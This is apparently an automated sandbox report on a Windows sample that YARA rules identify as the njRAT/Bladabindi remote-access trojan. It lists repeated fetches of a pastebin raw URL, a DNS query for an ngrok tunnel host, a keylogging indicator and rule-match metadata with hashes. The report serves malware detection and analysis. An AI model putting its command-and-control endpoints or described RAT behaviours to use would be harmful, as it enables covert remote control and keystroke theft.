          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: pastebin.com
          Source: global trafficDNS traffic detected: DNS query: 0.tcp.eu.ngrok.io
          Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
          Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/s4TipmJt
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49767 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.cs.Net Code: VKCodeToUnicode

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR

          System Summary

          barindex
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RevengeRAT malware Author: Florian Roth
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Detects RevengeRAT malware Author: Florian Roth
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
          Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RevengeRAT malware Author: Florian Roth
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeCode function: 0_2_00007FFD9B8E000A0_2_00007FFD9B8E000A
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeCode function: 0_2_00007FFD9B8E05010_2_00007FFD9B8E0501
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeCode function: 0_2_00007FFD9B8E23540_2_00007FFD9B8E2354
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeCode function: 0_2_00007FFD9B8E1EDA0_2_00007FFD9B8E1EDA
          Source: G1lnGpOLK4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
          Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
